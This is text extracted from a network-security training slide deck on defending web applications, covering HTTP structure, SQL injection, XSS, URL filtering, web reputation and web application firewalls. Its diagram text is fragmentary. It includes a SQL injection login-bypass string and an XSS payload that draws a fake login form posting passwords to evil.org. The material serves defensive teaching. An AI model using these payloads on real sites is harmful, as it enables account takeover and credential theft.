Professional Documents
Culture Documents
Defense
HTTP/HTTPS
Client Server
docroot
Index.html
HTTP/HTTPS
Enterprise
index.html
http://support.huawei.com/enterprise/zh/index.html
service.html
Images
device.jpg
icon.jpg
HTTP/HTTPS
An HTTP request packet is formed by the following four parts: request line,
request header, blank line, and request data.
Carriage
Request Protocol Newline
method
Space URL Space
version
return
character
Request line
character
Carriage
Header field Newline
: Value return
name character
character
… Request header
Carriage
Header field Newline
: Value return
name character
character
Carriage Newline
return characte
character r
Request data
In the request methods, the security of POST is higher than that of GET. Some
security risks may come from the GET field.
HTTP Response Packet
An HTTP response also consists of three parts: status line, response header,
and response data.
ORACLE:
In the user name field, enter 'Or' 1 '=' 1 'or' 1 '='
1. Or enter 1 'or' 1 '=' 1 in the password field.
Login
succeeded
Attacker /login.jsp
Basic Procedure for SQL Injection
XSS is one of the most popular network attack methods in recent years. It has
accounted for a large proportion of network attacks. Many websites, such as
Facebook, have encountered such attacks. In fact, the network viruses that
attack Sina Weibo, a well-known company in China, are also caused by XSS
vulnerabilities.
In essence, XSS is a malicious code execution method. XSS occurs because the
website does not strictly filter the data submitted by users.
Basic cross-site types:
Reflected XSS
Stored XSS
Implementation Procedure for Reflected XSS Attacks
Web server
or application
5. The attacker's
JavaScript is 2. The attacker submits the prepared URL to the user.
executed in the
user's browser. 6. The user's browser sends session tokens to the attacker.
User Attacker
Implementation Procedure for Stored XSS Attacks
Web server
or application
5. The attacker's
JavaScript is
executed in the
user's browser. 6. The user's browser sends session tokens to the attacker.
User Attacker
Example of the Reflected XSS Attacks
3
I bet you haven’t seen something like this.
The page contains
code and a dialog box
<script> is displayed.
document.body.innerHTML="<h1>Please
Login</h1><form User A
Hacker action=http://evil.org/grabpassword.jsp
method=post><br>User name:<input type=text
name=user><br>Password:<input type=text Should I log in
name=password></p><input type=submit again?
name=login></form>"
The user enters the user name and password,
</script>
and the submitted information is obtained by
the hacker.
The hacker enters the preceding code in a
1 normal web page.
4
CSRF
Code of conduct
Anti-DDoS
Each web page on the Internet has a unique identifier, that is, the URL.
hostname path
http://www.abcd.com:8080/news/education.aspx?name=tom&age=20
[:port] query
URL Filtering Principles
Intranet Employee A
!
Employee B Employee C
FW
6. If the request is invalid,
the device can directly close
3. The browser sends an HTTP the TCP connection.
5. If the request is valid,
GET request. the request is permitted and
the user can access the
corresponding website.
URL Classification and Filtering Technology
URL matching modes include prefix matching, suffix matching, keyword matching,
and exact matching.
Character
Matching
Function String Result
Mode
Example
All URLs that start with www.example are matched,
Prefix Matches URLs that start with a specified
www.example* including www.example.com and
matching character string.
www.example.com/solutions.do.
All URLs that end with aspx are matched, including
Suffix Matches all URLs that end with a www.example.com/news/solutions.aspx and
*aspx
matching specified character string. www.example.com/it/price.aspx.
10.1.1.1/sports/abc.aspx
Applicationrecognition
Protocol decoding
Mode matching
URL Filtering Process
filtering
User-defined category
filtering
User-definedlocal cache
query
Response
Overall Process of URL Filtering
Trust Untrust
Allow
Block
Solution if no policy is matched
Allow
Key Configurations for URL Filtering - URL Categories
3
User-defined URL categories
If a URL belongs to
3 1 multiple categories, the
2 FW takes an action based
If the URL does not match
on the action pattern.
any blacklist, whitelist,
The action pattern is
or URL category in the
either Strict or Loose.
local cache and the
remote query function for
predefined categories is
4 Configure the URL
unavailable, the FW will
blacklist and whitelist.
take the default action.
6
URL filtering level takes
effect only on predefined
categories. The actions
for user-defined
categories must be
manually configured by
the administrator. The
default action is Allow.
Sandbox interworking
Antivirus detection
Low-reputation websites
When the malicious URL detection function is enabled in the URL profile, the preceding
malicious URLs are detected in sequence.
Application Scenarios of the Web Reputation System
Remote server
Web Reputation System Processing Flow
Website A Website B
Internet
Detection node 1
Extracted files
Cluster
manager Detection node 2
FW
Detection node 3
Enterprise
Traffic of website A
intranet
Traffic of website B
Website Category Divided by Web Reputation
The Web reputation function categorizes websites into the following four
categories based on their reputation:
End
Web Reputation Matching Mode
The web reputation function extracts the host field information from the URL
of an accessed website and matches the string with web reputation website
categories. The host field can be a domain name or an IP address.
host Field
Level-1 Domain Name Example Matching Mode
Format
N/A 192.168.10.10 or The system directly
IP address 192.168.10.10:8080 matches the string
without any
Does not contain dots example, example-abc, or processing.
(.). example123
3
4
Add credible websites.
2
The WAF runs series of security policies for the HTTP/HTTPS to protect web
applications.
Specifically, the WAF filters each field in an HTTP packet based on rules.
WAF Workflow
The WAF consists of the execution Front End, back-end center system, and
database.
Web configuration
Front End
Export the detection WAF configurations
result Rule configurations
Blacklist
Sensitive information
Server vulnerability
SQL injection/CC
submission
attacks
attacks
Normal access
Web
SQL injection/CC attacks Network Security Web service Content
application Normal
security whitelist security security access
Server vulnerability attacks security
check check check check
check
Sensitive information submission
Normal access
WAF Functions
In-depth security
defense
WAF functions
High-performance Anti-tempering
detection
XSS attacks
SQL injection
Command injection
Cookie/Session hijacking
Parameter or list
tampering
Buffer overflow attacks
Directory traversal Web applications
CSRF attacks Input detection
Link theft
WAF
WAF
WAF
Get /show.asp?id=1
Get /show.asp?id=2
Get /show.asp?id=3
Get /show.asp?id=4
Get /show.asp?id=…
Time axis
CC attack defense
00:00:00 00:01:00
module
Self-Learning Modeling and Whitelist Defense
WAF Output
detection
High-Performance Detection
WAF
High-performance
detection module
WAF
Anti-
tampering
Cache module module
Automatic Detection Application
WAF
WAF
Obtain
User 1
Obtain
User 2
Cache module
WAF Deployment Mode (1/2)
WAF
CC attack defense
High-performance
delivery engine
Self-learning
Application
whitelist
Blacklist
signature
database
module
engine
Matches the IP Matches the IP address
address and port Application layer and port number of the
number of the site to site to be protected.
be protected.
Presentation layer
Does not match the IP Session layer Does not match the IP address
address and port number of Transmission layer Proxy/Transparent transmission and port number of the site to
the site to be protected. be protected.
Network layer Proxy/Transparent transmission
Matches the IP address MAC address learning Matches the IP
of the site to be Data link layer address of the site
Data packet forwarding
protected. to be protected.
Physical layer
Does not match the IP Does not match the IP
address of the site to be address of the site to be
protected. protected.
Quiz
A. Client
B. Server
C. Application software
D. Communication channel
A. Reflected XSS
B. Anonymous XSS
C. Stored XSS
D. Injection XSS
Summary
Both the IPS and WAF can detect HTTP vulnerabilities. However, the two
functions are different. For example, in terms of attack sample
identification, the IPS identifies samples using dictionary or keyword
matching, which is not flexible. Contrarily, the WAF supports flexible syntax
such as regular matching, length calculation, and reverse calculation for
object matching, and has multiple complex decoding capabilities.
As for the working mode, the WAF supports code conversion, whereas the IPS
supports static identification only. Therefore, the WAF is more powerful than
the IPS in web application attack defense.
THANK YOU